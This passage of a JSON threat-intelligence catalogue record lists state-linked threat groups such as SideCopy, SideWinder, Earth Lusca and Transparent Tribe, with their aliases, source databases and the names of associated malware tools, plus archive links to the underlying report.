			"id": "b584b10a-7d54-4d05-9e21-b223563df7b8",
			"created_at": "2022-10-25T16:07:24.181589Z",
			"updated_at": "2026-04-10T02:00:04.892659Z",
			"deleted_at": null,
			"main_name": "SideCopy",
			"aliases": [
				"G1008",
				"Mocking Draco",
				"TAG-140",
				"UNC2269",
				"White Dev 55"
			],
			"source_name": "ETDA:SideCopy",
			"tools": [
				"ActionRAT",
				"AllaKore",
				"Allakore RAT",
				"AresRAT",
				"Bladabindi",
				"CetaRAT",
				"DetaRAT",
				"EpicenterRAT",
				"Jorik",
				"Lilith",
				"Lilith RAT",
				"MargulasRAT",
				"ReverseRAT",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "6b9fc913-06c6-4432-8c58-86a3ac614564",
			"created_at": "2022-10-25T16:07:24.185236Z",
			"updated_at": "2026-04-10T02:00:04.893541Z",
			"deleted_at": null,
			"main_name": "SideWinder",
			"aliases": [
				"APT-C-17",
				"APT-Q-39",
				"BabyElephant",
				"G0121",
				"GroupA21",
				"HN2",
				"Hardcore Nationalist",
				"Rattlesnake",
				"Razor Tiger",
				"SideWinder",
				"T-APT-04"
			],
			"source_name": "ETDA:SideWinder",
			"tools": [
				"BroStealer",
				"Capriccio RAT",
				"callCam"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "abb24b7b-6baa-4070-9a2b-aa59091097d1",
			"created_at": "2022-10-25T16:07:24.339942Z",
			"updated_at": "2026-04-10T02:00:04.944806Z",
			"deleted_at": null,
			"main_name": "Transparent Tribe",
			"aliases": [
				"APT 36",
				"APT-C-56",
				"Copper Fieldstone",
				"Earth Karkaddan",
				"G0134",
				"Green Havildar",
				"Mythic Leopard",
				"Opaque Draco",
				"Operation C-Major",
				"Operation Honey Trap",
				"Operation Transparent Tribe",
				"ProjectM",
				"STEPPY-KAVACH",
				"Storm-0156",
				"TEMP.Lapis",
				"Transparent Tribe"
			],
			"source_name": "ETDA:Transparent Tribe",
			"tools": [
				"Amphibeon",
				"Android RAT",
				"Bezigate",
				"Bladabindi",
				"Bozok",
				"Bozok RAT",
				"BreachRAT",
				"Breut",
				"CapraRAT",
				"CinaRAT",
				"Crimson RAT",
				"DarkComet",
				"DarkKomet",
				"ElizaRAT",
				"FYNLOS",
				"Fynloski",
				"Jorik",
				"Krademok",
				"Limepad",
				"Luminosity RAT",
				"LuminosityLink",
				"MSIL",
				"MSIL/Crimson",
				"Mobzsar",
				"MumbaiDown",
				"Oblique RAT",
				"ObliqueRAT",
				"Peppy RAT",
				"Peppy Trojan",
				"Quasar RAT",
				"QuasarRAT",
				"SEEDOOR",
				"Scarimson",
				"SilentCMD",
				"Stealth Mango",
				"UPDATESEE",
				"USBWorm",
				"Waizsar RAT",
				"Yggdrasil",
				"beendoor",
				"klovbot",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c68fa27f-e8d9-4932-856b-467ccfe39997",
			"created_at": "2023-01-06T13:46:38.450585Z",
			"updated_at": "2026-04-10T02:00:02.980334Z",
			"deleted_at": null,
			"main_name": "Operation C-Major",
			"aliases": [
				"APT36",
				"APT 36",
				"TMP.Lapis",
				"COPPER FIELDSTONE",
				"Storm-0156",
				"Transparent Tribe",
				"ProjectM",
				"Green Havildar",
				"Earth Karkaddan",
				"C-Major",
				"Mythic Leopard"
			],
			"source_name": "MISPGALAXY:Operation C-Major",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "173f1641-36e3-4bce-9834-c5372468b4f7",
			"created_at": "2022-10-25T15:50:23.349637Z",
			"updated_at": "2026-04-10T02:00:05.3486Z",
			"deleted_at": null,
			"main_name": "Sidewinder",
			"aliases": [
				"Sidewinder",
				"T-APT-04"
			],
			"source_name": "MITRE:Sidewinder",
			"tools": [
				"Koadic"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775439119,
	"ts_updated_at": 1775826771,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6ad77b985f6bb09a34b6c121621cbbc727001a2a.pdf",
		"text": "https://archive.orkl.eu/6ad77b985f6bb09a34b6c121621cbbc727001a2a.txt",
		"img": "https://archive.orkl.eu/6ad77b985f6bb09a34b6c121621cbbc727001a2a.jpg"
	}
}